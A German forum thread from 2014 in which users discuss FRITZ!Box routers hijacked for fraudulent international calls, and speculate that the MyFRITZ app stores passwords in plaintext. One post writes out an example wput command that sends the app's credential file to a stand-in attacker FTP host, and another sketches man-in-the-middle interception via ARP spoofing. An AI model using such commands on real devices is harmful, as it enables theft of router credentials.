Fritz.Box wurde gehackt

In diesem Forum geht es um die Router für Kabel Internet FRITZ!Box 6320, FRITZ!Box 6340, FRITZ!Box 6360, FRITZ!Box 6490 & FRITZ!Box 6590 Cable der Firma AVM.
-Pirat-
Kabelneuling
Beiträge: 35
Registriert: 05.03.2011, 00:56

Re: Fritz.Box wurde gehackt

Beitrag von -Pirat- » 06.02.2014, 14:13

conscience hat geschrieben: Hast Du mal einen Virenscan durchgeführt?
Nicht nur einen. Hab paar mal den von BitDefender 2014 durchlaufen lassen und paar mal noch Norton Internet Security 2014. Alles schön Sauber :super:

Benutzeravatar
SpaceRat
Glasfaserstrecke
Beiträge: 2467
Registriert: 08.05.2010, 01:30
Wohnort: Kreis Aachen
Kontaktdaten:

Re: Fritz.Box wurde gehackt

Beitrag von SpaceRat » 06.02.2014, 14:17

-Pirat- hat geschrieben:Norton Internet Security 2014. Alles schön Sauber :super:
Das ist ein Widerspruch in sich, dieser Norton-Rotz ist an sich schon die größte denkbare Schadsoftware.

Übrigens:

Der Scan eines Systems aus dem laufenden System heraus ist wertlos.
Innerhalb eines laufenden Systems kann sich Schadsoftware einem Scan entziehen.

Wenn überhaupt scannt man ein möglicherweise kompromittiertes System aus einem anderen heraus, z.B. mit Desinfec't.

hagewe1111
Kabelneuling
Beiträge: 1
Registriert: 06.02.2014, 15:20

Re: Fritz.Box wurde gehackt

Beitrag von hagewe1111 » 06.02.2014, 15:36

Ich hatte gestern nachmittag Besuch von 2 Beamten des LKA NRW. Diese waren mit einem Durchsuchungsbeschluss
des Amtsgerichts Köln ausgestattet und haben sich meinen PC genau angeschaut und dabei gemeinsam mit mir
festgestellt, dass auch meine FritzBox gehackt war.
Allein in den letzten 3 Tagen ca 150 Anrufe an eine Nummer auf Haiiti und noch ein paar an eine Nummer auf den
Komoren. Schaden ein paar Tausend Euro.
Gestern abend dann ein Anruf von Unitymedia. Dabei hat mir dann ein Mitarbeiter Schritt für Schritt erklärt,
wie ich meine FritzBox konfigurieren muss, um das Gerät weiter nutzen zu können.

Weder die Polizei noch Unitymedia konnten erklären, wie es gelungen ist die Box zu knacken.

Bin mal gespannt, wie das weiter geht.

cemetery
Kabelneuling
Beiträge: 24
Registriert: 03.01.2014, 19:39

Re: Fritz.Box wurde gehackt

Beitrag von cemetery » 06.02.2014, 16:23

SpaceRat hat geschrieben:
-Pirat- hat geschrieben:Norton Internet Security 2014. Alles schön Sauber :super:
Das ist ein Widerspruch in sich, dieser Norton-Rotz ist an sich schon die größte denkbare Schadsoftware.

Übrigens:

Der Scan eines Systems aus dem laufenden System heraus ist wertlos.
Innerhalb eines laufenden Systems kann sich Schadsoftware einem Scan entziehen.

Wenn überhaupt scannt man ein möglicherweise kompromittiertes System aus einem anderen heraus, z.B. mit Desinfec't.
Bin ich voll und ganz deiner Meinung.

Was meiner Meinung nach aber total in den Hintergrund rückt ist der Punkt dass ja wohl grundsätzlich mal jedes System von dem in der Vergangenheit auf die Fritzdienste zugegriffen wurde als mögliche Ursache in Frage kommen würde oder sehe ich das falsch :confused: Also nicht nur der heimische PC sondern möglicherweise auch Smartphones, Tablets usw.

So oder so ist das ganze wieder Wasser auf den Mühlen der Fritzbox Gegner denen sie gegen ihren Willen aufs Auge gedrückt wurde. Und ich muss zugeben ich wäre wohl auch etwas Schadenfroh wenn sich am Ende gar ein Wartungshintertürchen der Provider als Sicherheitslücke entpuppen würde :D

Allen betroffenen Drücke ich aber beide Daumen dass sie am Ende nicht auf dem Schaden sitzen bleiben :traurig:

Arnie-75
erfahrener Kabelkunde
Beiträge: 93
Registriert: 08.11.2012, 15:18

Re: Fritz.Box wurde gehackt

Beitrag von Arnie-75 » 06.02.2014, 16:40

hagewe1111 hat geschrieben:Ich hatte gestern nachmittag Besuch von 2 Beamten des LKA NRW. Diese waren mit einem Durchsuchungsbeschluss
des Amtsgerichts Köln ausgestattet und haben sich meinen PC genau angeschaut und dabei gemeinsam mit mir
festgestellt, dass auch meine FritzBox gehackt war.
Was stand denn im LOG bzw. unter SYSTEM, als sich der Angreifer angemeldet hat? Wenn ich mich übers Internet anmelde steht da z.B.
"Anmeldung des Benutzers MeinName an der FRITZ!Box Benutzeroberfläche von IP-Adresse xx.143.xxx.xxx"

cemetery
Kabelneuling
Beiträge: 24
Registriert: 03.01.2014, 19:39

Re: Fritz.Box wurde gehackt

Beitrag von cemetery » 06.02.2014, 17:11

Arnie-75 hat geschrieben:
hagewe1111 hat geschrieben:Ich hatte gestern nachmittag Besuch von 2 Beamten des LKA NRW. Diese waren mit einem Durchsuchungsbeschluss
des Amtsgerichts Köln ausgestattet und haben sich meinen PC genau angeschaut und dabei gemeinsam mit mir
festgestellt, dass auch meine FritzBox gehackt war.
Was stand denn im LOG bzw. unter SYSTEM, als sich der Angreifer angemeldet hat? Wenn ich mich übers Internet anmelde steht da z.B.
"Anmeldung des Benutzers MeinName an der FRITZ!Box Benutzeroberfläche von IP-Adresse xx.143.xxx.xxx"
Ursprungsland schon geprüft?

planethas
Kabelneuling
Beiträge: 8
Registriert: 31.01.2014, 22:53

Re: Fritz.Box wurde gehackt

Beitrag von planethas » 06.02.2014, 17:34

Also auch ich will mal meinen Senf dazu beitragen. Ein Bekannter hat auch das Problem und seinen UM Business Anschluss letzten Monat erst bekommen, diesen habe ich nur von einem Windows Phone konfiguriert (Von intern via WLAN) und später nochmals per Fernwartung von meinem iPhone den WLAN PSK geändert. Der Anschluss wird z.Z. nur von dem einen Windows Phone genutzt, aber die Zugangsdaten zur Box habe nur ich.

Eigentlich wollte ich nur noch aus der Ferne das VPN konfigurieren und hätte es eigentlich nicht machen sollen, vorallem weil ich selbst im IT-Security Bereich tätig bin und weiß wie schnell es gehen kann.

Es kann eingentlich nur "jemand" beim ändern des WLAN PSK meine Zugangsdaten zur Box abgegriffen haben oder auf einem der Smartphones ist eine Schadsoftware (unwahrscheinlicher als das erste).

Ich werde jetzt wohl nochmal genau überlegen von welchem Netz aus ich die Änderung des WLAN PSK gemacht habe und versuchen den Zusammenhang zu finden.

Ach ja, auf der Box konnte man sehen, dass sich jemand mit meinen Zugangsdaten eingelogt hat und von welcher IP. Ich habe die Box dummerweise neu gestartet ohne einen Screenshot zu machen.

Gibt es schon eine offizielle Stellungnahme von UM zur Kosten Thematik? Der Techniker von UM meinte am Telefon zu meinem Bekannten wohl, die kosten müsse er nicht tragen.

cemetery
Kabelneuling
Beiträge: 24
Registriert: 03.01.2014, 19:39

Re: Fritz.Box wurde gehackt

Beitrag von cemetery » 06.02.2014, 18:10

planethas hat geschrieben:Es kann eingentlich nur "jemand" beim ändern des WLAN PSK meine Zugangsdaten zur Box abgegriffen haben oder auf einem der Smartphones ist eine Schadsoftware (unwahrscheinlicher als das erste).
Würde aber auch voraussetzen das entweder das Remotegerät kompromittiert ist, die Fritzbox selbst oder der Zwischenhandler was in dem Fall wohl der Server von myFRITZ wäre. Soweit ich das gesehen habe erfolgt die Verbindung dort aber auch verschlüsselt. Also selbst in einem offenen WLAN (Musterbeispiel) greifst da nicht mal eben so die Zugangsdaten ab.

So sehr es mich für die Betroffenen freut macht es mich andererseits auch stutzig wie schnell man hier Seitens der Betreiber die Zusage macht das die Kosten nicht vom Anschlussinhaber zu tragen sind :kratz: Bin wirklich sehr gespannt wie das ganze weiter geht.

Arnie-75
erfahrener Kabelkunde
Beiträge: 93
Registriert: 08.11.2012, 15:18

Re: Fritz.Box wurde gehackt

Beitrag von Arnie-75 » 06.02.2014, 19:09

Ich halte es für sehr unwahrscheinlich, dass die Einbrüche oer WLAN stattfanden. Interessenat wäre das LOG eines Betroffenen. ;)

johnripper
Glasfaserstrecke
Beiträge: 1286
Registriert: 06.02.2014, 19:29
Wohnort: Kabelbw-Land

Re: Fritz.Box wurde gehackt

Beitrag von johnripper » 06.02.2014, 19:32

planethas hat geschrieben:Ich habe die Box dummerweise neu gestartet ohne einen Screenshot zu machen.
Sowas ist halt schade, da wichtige Informationen verloren gehen. Idealerweise hättest du die HL angerufen, die einen Datenabzug hätte machen können um entsprechende Infos zu sammeln.

Wie auch immer, ich wüsste gerne ob in diesem Fall irgendwelche APPs im Spiel waren?
Office & Internet 150 @ Fritz!Box 6490, OS 6.50

cemetery
Kabelneuling
Beiträge: 24
Registriert: 03.01.2014, 19:39

Re: Fritz.Box wurde gehackt

Beitrag von cemetery » 06.02.2014, 20:06

Arnie-75 hat geschrieben:Ich halte es für sehr unwahrscheinlich, dass die Einbrüche oer WLAN stattfanden. Interessenat wäre das LOG eines Betroffenen. ;)
Sorry, hab das wohl unglücklich formuliert. Ich meinte keinen Angriff per WLAN sondern das abgreifen der Daten wenn man sich z.B. über einen öffentlichen Hotspot dann auf der Box einloggt. Kommt gerade bei E-Mail Accountdaten sehr oft vor das die Daten so abgegriffen werden.

johnripper
Glasfaserstrecke
Beiträge: 1286
Registriert: 06.02.2014, 19:29
Wohnort: Kabelbw-Land

Re: Fritz.Box wurde gehackt

Beitrag von johnripper » 06.02.2014, 20:17

Deswegen ja HTTPS, somit sollte dies eigentlich nicht möglich sein.
Office & Internet 150 @ Fritz!Box 6490, OS 6.50

cemetery
Kabelneuling
Beiträge: 24
Registriert: 03.01.2014, 19:39

Re: Fritz.Box wurde gehackt

Beitrag von cemetery » 06.02.2014, 20:33

Genau, wenn nicht schon der Server auf dem die Anmeldung erfolgt bereits kompromittiert ist. In der Datenbank sind die Passwörter ja auch verschlüsselt abgelegt. Dass da was geklaut wurde ist also auch eher unwahrscheinlich. Bliebe noch die Möglichkeit das die Zugangsdaten evtl. in einer App unverschlüsselt auf dem Gerät abgelegt waren und möglicherweise von einer anderen App ausgelesen wurden. Aber das ist ohne Log Files und rekonstruierbare Details natürlich alles fischen im trüben.

toomore
Kabelneuling
Beiträge: 2
Registriert: 07.02.2014, 08:37

Re: Fritz.Box wurde gehackt

Beitrag von toomore » 07.02.2014, 08:41

Ich bin leider auch Opfer geworden, nur das Unitymedia bei mir keine Kulanz geben will, da die Fritzbox privat gekauft wurde und nicht durch Unitymedia gemietet wurde. Hab schon ganz schön Panik was für ein Betrag da jetzt kommt. Die Angreifer haben am 31.01 ca. 10x je 1-18 Sekunden nach 0023xxxxx angerufen. Die am 3.2 erzeugen vier Anrufe dürften nicht zählen, da dort Unitymedia nach eigenen Angaben bereits die Auslandanrufe gesperrt hatte. Aber warum rufen die mich dann nicht mal eben an und sagen bescheid?

Hafte ich jetzt selber für den Schade? Was kann ich tun? Ich hatte immer das neueste OS drauf und verschiedene und wechselnde Passwörter....
Zuletzt geändert von toomore am 07.02.2014, 08:45, insgesamt 1-mal geändert.

Joe Bar
Kabelneuling
Beiträge: 29
Registriert: 04.10.2013, 10:00

Re: Fritz.Box wurde gehackt

Beitrag von Joe Bar » 07.02.2014, 08:44

Hallo zusammen,

was mich jetzt mal in dem Zusammenhang interessieren würde:
Welche Boxen mit welcher Firmware waren bislang betroffen?

Gruß,
Knut
Bild

-Pirat-
Kabelneuling
Beiträge: 35
Registriert: 05.03.2011, 00:56

Re: Fritz.Box wurde gehackt

Beitrag von -Pirat- » 07.02.2014, 08:59

toomore hat geschrieben: Die Angreifer haben am 31.01 ca. 10x je 1-18 Sekunden nach 0023xxxxx angerufen...
Du glücklicher, dann schau dir mal meine Liste an

Code: Alles auswählen

03.02.2014 16:03		50022247	IP-Telefon 1	00:26
03.02.2014 15:49		50022247	IP-Telefon 1	00:26
03.02.2014 15:36		50022247	IP-Telefon 1	00:26
03.02.2014 15:24		50022247	IP-Telefon 1	00:26
03.02.2014 15:23		50022247	IP-Telefon 1	00:02
03.02.2014 15:11		50022247	IP-Telefon 1	00:26
03.02.2014 14:57		50022247	IP-Telefon 1	00:26
03.02.2014 14:56		50022247	IP-Telefon 1	00:02
03.02.2014 14:31		50022247	IP-Telefon 1	00:26
03.02.2014 14:06		50022247	IP-Telefon 1	00:26
03.02.2014 14:00		50022247	IP-Telefon 1	01:11
03.02.2014 13:50		50022247	IP-Telefon 1	00:08
03.02.2014 13:50		50022247	IP-Telefon 1	00:16
03.02.2014 13:34		50022247	IP-Telefon 1	00:16
03.02.2014 13:32		50022247	IP-Telefon 1	00:16
03.02.2014 13:25		50022247	IP-Telefon 1	00:08
03.02.2014 12:17		50022247	IP-Telefon 1	01:11
03.02.2014 12:14		50022247	IP-Telefon 1	01:11
03.02.2014 12:09		50022247	IP-Telefon 1	00:08
03.02.2014 12:04		50022247	IP-Telefon 1	00:10
03.02.2014 11:50		50022247	IP-Telefon 1	00:08
03.02.2014 11:34		50022247	IP-Telefon 1	00:16
03.02.2014 11:01		50022247	IP-Telefon 1	00:08
03.02.2014 10:54		50022247	IP-Telefon 1	01:11
03.02.2014 10:53		50022247	IP-Telefon 1	00:08
03.02.2014 10:45		50022247	IP-Telefon 1	00:10
03.02.2014 10:17		50022247	IP-Telefon 1	00:26
03.02.2014 10:15		50022247	IP-Telefon 1	00:10
03.02.2014 10:00		50022247	IP-Telefon 1	00:16
03.02.2014 09:50		50022247	IP-Telefon 1	00:10
03.02.2014 09:49		50022247	IP-Telefon 1	00:28
03.02.2014 09:17		50022247	IP-Telefon 1	00:33
03.02.2014 09:02		50022247	IP-Telefon 1	00:15
03.02.2014 08:50		50022247	IP-Telefon 1	00:12
03.02.2014 08:39		50022247	IP-Telefon 1	01:11
03.02.2014 08:25		50022247	IP-Telefon 1	00:26
03.02.2014 08:14		50022247	IP-Telefon 1	00:26
03.02.2014 07:56		50022247	IP-Telefon 1	00:26
03.02.2014 07:46		50022247	IP-Telefon 1	00:26
03.02.2014 07:30		50022247	IP-Telefon 1	00:26
03.02.2014 07:16		50022247	IP-Telefon 1	00:26
03.02.2014 07:01		50022247	IP-Telefon 1	00:26
03.02.2014 07:00		50022247	IP-Telefon 1	00:02
03.02.2014 06:51		50022247	IP-Telefon 1	00:26
03.02.2014 06:34		50022247	IP-Telefon 1	00:26
03.02.2014 06:26		50022247	IP-Telefon 1	00:26
03.02.2014 06:09		50022247	IP-Telefon 1	00:26
03.02.2014 06:06		50022247	IP-Telefon 1	00:02
03.02.2014 05:52		50022247	IP-Telefon 1	00:26
03.02.2014 05:46		50022247	IP-Telefon 1	00:02
03.02.2014 05:40		50022247	IP-Telefon 1	00:26
03.02.2014 05:19		50022247	IP-Telefon 1	00:26
03.02.2014 05:15		50022247	IP-Telefon 1	00:26
03.02.2014 05:02		50022247	IP-Telefon 1	00:09
03.02.2014 05:00		50022247	IP-Telefon 1	00:15
03.02.2014 04:51		50022247	IP-Telefon 1	00:11
03.02.2014 04:50		50022247	IP-Telefon 1	00:11
03.02.2014 04:42		50022247	IP-Telefon 1	00:07
03.02.2014 04:41		50022247	IP-Telefon 1	00:11
03.02.2014 04:35		50022247	IP-Telefon 1	00:08
03.02.2014 04:34		50022247	IP-Telefon 1	00:07
03.02.2014 04:23		50022247	IP-Telefon 1	00:12
03.02.2014 04:21		50022247	IP-Telefon 1	00:13
03.02.2014 04:12		50022247	IP-Telefon 1	00:10
03.02.2014 04:09		50022247	IP-Telefon 1	00:14
03.02.2014 04:05		50022247	IP-Telefon 1	00:07
03.02.2014 03:57		50022247	IP-Telefon 1	00:08
03.02.2014 03:57		50022247	IP-Telefon 1	00:10
03.02.2014 03:44		50022247	IP-Telefon 1	00:13
03.02.2014 03:43		50022247	IP-Telefon 1	00:15
03.02.2014 03:32		50022247	IP-Telefon 1	00:13
03.02.2014 03:32		50022247	IP-Telefon 1	00:10

Die Telefonnummer ist 0050022247 nicht 50022247
Da war einer fleißig :wand:

Benutzeravatar
SpaceRat
Glasfaserstrecke
Beiträge: 2467
Registriert: 08.05.2010, 01:30
Wohnort: Kreis Aachen
Kontaktdaten:

Re: Fritz.Box wurde gehackt

Beitrag von SpaceRat » 07.02.2014, 09:07

-Pirat- hat geschrieben:Die Telefonnummer ist 0050022247 nicht 50022247
Da war einer fleißig :wand:
Falklands Conservation

General Enquiries +500 22247
Dr. David Doxford Chief Executive Officer +500 22247
Dr Andrew Stanworth Conservation Officer +500 22247

"In partnership with government, industry and the global community, Falklands Conservation will engage and empower the people of the Falkland Islands to take action with us to conserve biodiversity and manage landscapes and seascapes for the benefit of nature and people"
Receiver/TV:
  • Vu+ Duo² 4xS2+2xC / OpenATV 6.1@Samsung 50" Plasma
  • AX Quadbox HD2400 2xS2+2xC / OpenATV 6.1@Samsung 32" TFT
  • 2xVu+ Solo² / OpenATV 6.1
  • DVBSky S2-Twin PCIe@SyncMaster T240HD (PC)
  • TechniSat SkyStar HD2@17" (2.PC)
Pay-TV: Schwarzfunk, Redlight Elite Superchic, SCT 10, HD-, Sky
Fon: VF Komfort-Classic (ISDN), 2xFritz!Fon C4+Siedle DoorCom Analog@F!B 7390
Internet: UM 1play 100 / Cisco EPC3212+Linksys WRT1900ACS / IPv4 (UM) + IPv6 (HE)
Bild

tq1199
Glasfaserstrecke
Beiträge: 1816
Registriert: 07.02.2014, 09:05

Re: Fritz.Box wurde gehackt

Beitrag von tq1199 » 07.02.2014, 09:13

toomore hat geschrieben:Was kann ich tun? ...
Benutzt Du den myfritz-Dienst von AVM? Kannst Du im Log deiner FritzBox sehen, von welcher externen (öffentlicher) IP-Adresse, der Angreifer sich auf deiner FritzBox angemeldet hat?

johnripper
Glasfaserstrecke
Beiträge: 1286
Registriert: 06.02.2014, 19:29
Wohnort: Kabelbw-Land

Re: Fritz.Box wurde gehackt

Beitrag von johnripper » 07.02.2014, 09:21

toomore hat geschrieben:Ich bin leider auch Opfer geworden, nur das Unitymedia bei mir keine Kulanz geben will, da die Fritzbox privat gekauft wurde und nicht durch Unitymedia gemietet wurde.
Die Konfiguration musst du uns erklären.
Office & Internet 150 @ Fritz!Box 6490, OS 6.50

toomore
Kabelneuling
Beiträge: 2
Registriert: 07.02.2014, 08:37

Re: Fritz.Box wurde gehackt

Beitrag von toomore » 07.02.2014, 09:24

johnripper hat geschrieben:
toomore hat geschrieben:Ich bin leider auch Opfer geworden, nur das Unitymedia bei mir keine Kulanz geben will, da die Fritzbox privat gekauft wurde und nicht durch Unitymedia gemietet wurde.
Die Konfiguration musst du uns erklären.
Die Fritbox ist eine 7330 und ist per Lan Port hinter das Cisco Modem gehängt. Vorher hatte ich einen DLink Router von Unitymedia dahinter. Nachdem der laut Unity eine Sicherheitslücke hatte, habe ich meine Fritzbox angeschlossen. Wohl genauso unsicher :/ Ja habe myFritz genutzt, habe aber nun alle Haken entfernt, MyFritz Account gelöscht und das Telefon physikalisch von der Fritzbox abgezogen.

Wie teuer sind den diese Nummern? 60er Taktung oder wie?

tq1199
Glasfaserstrecke
Beiträge: 1816
Registriert: 07.02.2014, 09:05

Re: Fritz.Box wurde gehackt

Beitrag von tq1199 » 07.02.2014, 09:35

toomore hat geschrieben:MyFritz Account gelöscht ...
Ja, ... verstehe.
toomore hat geschrieben: ... das Telefon physikalisch von der Fritzbox abgezogen.
BTW: Der Angreifer hat nicht dein Telefon benutzt.
Kannst Du im Log deiner FritzBox sehen, von welcher externen (öffentlicher) IP-Adresse, der Angreifer sich auf deiner FritzBox angemeldet hat?

EDIT:

Wenn Du diese externe (öffentliche) IP-Adresse hast, dann erstatte Anzeige gegen denjenigen, der diese externe IP-Adresse am ... (siehe Datum und Uhrzeit im Log deiner FritzBox) verwendet hat.

EDIT 2:

Benutzt Du evtl. Fritz!Apps von AVM oder fremd, auf deinem Smartphone/Tablet für deine FritzBox?
Office Internet & Phone 50, AVM FRITZ!Box 6360 Cable (kbw) - FRITZ!OS 06.52 - , an Arris-CMTS, zusätzlich eine feste (statische, nicht per DHCP) IPv4-Adresse für meinen Server, am Bridge-Anschluss (kein Bridge-Modus, FB6360-cable wird ohne feste IPv4-Adresse als Router verwendet.)
Konfigurationsdatei der FritzBox: b2b-staticip1_50000_5000_ipv4_sip_wifi-on.bin
NTP_Provider_Interface_Spec_Unitymedia

AVM - IPv6 technical note

Benutzeravatar
SpaceRat
Glasfaserstrecke
Beiträge: 2467
Registriert: 08.05.2010, 01:30
Wohnort: Kreis Aachen
Kontaktdaten:

Re: Fritz.Box wurde gehackt

Beitrag von SpaceRat » 07.02.2014, 10:11

Ich schließe mich zunehmend der Haltung an, daß hier genau gar nichts gehackt wurde.

Soweit das zu überblicken ist, haben sich die Angreifer schnurstracks mit den richtigen Zugangsdaten eingeloggt und nicht geknobelt und probiert.
Die wahrscheinlichste Variante ist also, daß die Opfer ihnen die Daten auf dem Silbertablett, zumindest einem versilberten, geliefert haben.

Es könnte sich um irgendeine sensationell wichtige App handeln, die unbedingt Zugang zur Fritz!Box braucht und die Zugangsdaten dann - sicher ist sicher, so vergißt sie keiner ;) - dem App-Anbieter zuspielt. Auch möglich wäre, daß eine weitere App Daten ausliest.

Schauen wir doch mal nach:
MyFRITZ!App

Man beachte:
Bild

Also alles was man zum Glück braucht.

Und das finden wir dann auch im Klartext auf dem Smartphone wieder:
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
<string name="BoxName">FRITZ!Box Fon WLAN 7390</string>
...
<string name="Password">Passwort_im_Klartext</string>
...
<string name="Adresse">labersuelzrhabarber.myfritz.net</string>
<string name="Boxname">FRITZ!Box Fon WLAN 7390</string>
<int name="Port" value="123" />
<string name="Username">Otto Opfer</string>
<boolean name="AnonymousLogin" value="true" />
<boolean name="SingleSignOn" value="true" />
</map>
Jetzt fehlt nur noch eine Version vom Quiz-Duell oder Weißdergeierwas, die nicht nur gecracked, sondern auch noch etwas "ergänzt" wurde ...
Receiver/TV:
  • Vu+ Duo² 4xS2+2xC / OpenATV 6.1@Samsung 50" Plasma
  • AX Quadbox HD2400 2xS2+2xC / OpenATV 6.1@Samsung 32" TFT
  • 2xVu+ Solo² / OpenATV 6.1
  • DVBSky S2-Twin PCIe@SyncMaster T240HD (PC)
  • TechniSat SkyStar HD2@17" (2.PC)
Pay-TV: Schwarzfunk, Redlight Elite Superchic, SCT 10, HD-, Sky
Fon: VF Komfort-Classic (ISDN), 2xFritz!Fon C4+Siedle DoorCom Analog@F!B 7390
Internet: UM 1play 100 / Cisco EPC3212+Linksys WRT1900ACS / IPv4 (UM) + IPv6 (HE)
Bild

cemetery
Kabelneuling
Beiträge: 24
Registriert: 03.01.2014, 19:39

Re: Fritz.Box wurde gehackt

Beitrag von cemetery » 07.02.2014, 10:17

Das untermauert dann genau den Verdacht den ich gestern auch schon ausgesprochen habe. :super:

Benutzeravatar
SpaceRat
Glasfaserstrecke
Beiträge: 2467
Registriert: 08.05.2010, 01:30
Wohnort: Kreis Aachen
Kontaktdaten:

Re: Fritz.Box wurde gehackt

Beitrag von SpaceRat » 07.02.2014, 10:24

Und das ist dann der ganze Hack:
wput /data/data/de.avm.android.myfritz/shared_prefs/de.avm.android.myfritz_preferences.xml ftp://send.me.all.your.data.cn/Project_ ... irgendeine ZufallsID>.xml

Statt wput tut's auch so ziemlich alles andere.

Einziges Problem: Hierfür braucht die App man root-Zugriff

planethas
Kabelneuling
Beiträge: 8
Registriert: 31.01.2014, 22:53

Re: Fritz.Box wurde gehackt

Beitrag von planethas » 07.02.2014, 11:03

Zu den ganzen Vermutungen hier kann ich sagen, dass ich keine Zugangsdaten zu dieser Box in einer App hinterlegt habe/hatte.

Zu den Aussagen, HTTPS sei sicher möchte ich mal ein einfach ein paar Fakten in den Raum werfen.

Natürlich ist das HTTPS Protokoll mit den gängigen Standards Sicher, sofern die Zertifikatsquelle und/oder der Herausgeber des Zertifikats vertauenswürdig ist.

Habt Ihr auf eurer Fritzbox ein Öffentliches Zertifikat installiert oder habt das Selfsign Fritzbox Zertifikat auf jedem System von dem Ihr aus auf die Box zugreift vorher persönlich von der Box auf das jenige System übertragen und im Zertifikatsspeicher des Geräts als vertrauenswürdiges Zertifikat hinterlegt?

Oder wissen hier einfach einige nicht, dass auch bei HTTPS Man-In-The-Middle möglich ist. Sofern man nicht min. den Thumbprint des Zertifikats mit dem Original vergleicht, ist ein Selfsign Zertifikat keine Hürde.

Es ist ein einfaches im Stream das Zertifikat zu tauschen und alle Daten im Klartext mitzulesen. Das größere Problem hierbei ist es, den Datenstrom überhaupt so zu leiten/abzugreifen, dass mann an die Daten kommt. Aber auch dies ist mittels ARP Spoofing in selben Netz möglich, wobei gängige Firmware auf Switches dies erkennt und blockiert.

Aber wer weiß schon, welche neue Spoofing Methode die evtl nutzen um den Datenstrom abzugreifen/umzuleiten etc.
Zuletzt geändert von planethas am 07.02.2014, 11:08, insgesamt 1-mal geändert.

Antworten

Wer ist online?

Mitglieder in diesem Forum: Frank und frei und 2 Gäste